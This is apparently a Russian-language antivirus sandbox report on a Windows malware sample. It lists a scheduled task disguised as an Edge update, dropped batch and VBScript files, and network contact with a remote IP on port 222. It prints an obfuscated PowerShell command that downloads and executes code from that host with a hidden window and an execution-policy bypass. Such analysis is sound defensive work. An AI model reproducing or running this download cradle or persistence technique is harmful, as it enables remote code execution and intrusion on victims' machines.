Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\micros oftedgeupdate
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\pictures.bat
- C:\users\public\pictures.vbs
Сетевая активность
Подключается к
- '5.###.67.224':222
TCP
Запросы HTTP GET
- http://5.###.67.224:222/xxx.jpg via 5.###.67.224
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Pictures.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''http://5.230.67.224:222/xxx.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789...' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Pictures.vbs"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Pictures.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''http://5.230.67.224:222/xxx.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789...
- '<SYSTEM32>\taskeng.exe' {77A8DCE0-4A8C-4822-9318-E105BA3B74DE} S-1-5-21-3150914307-1777937420-491476919-1000:wovphkrpgruu\user:Interactive:[1]
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Pictures.bat" "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Pictures.ps1'"
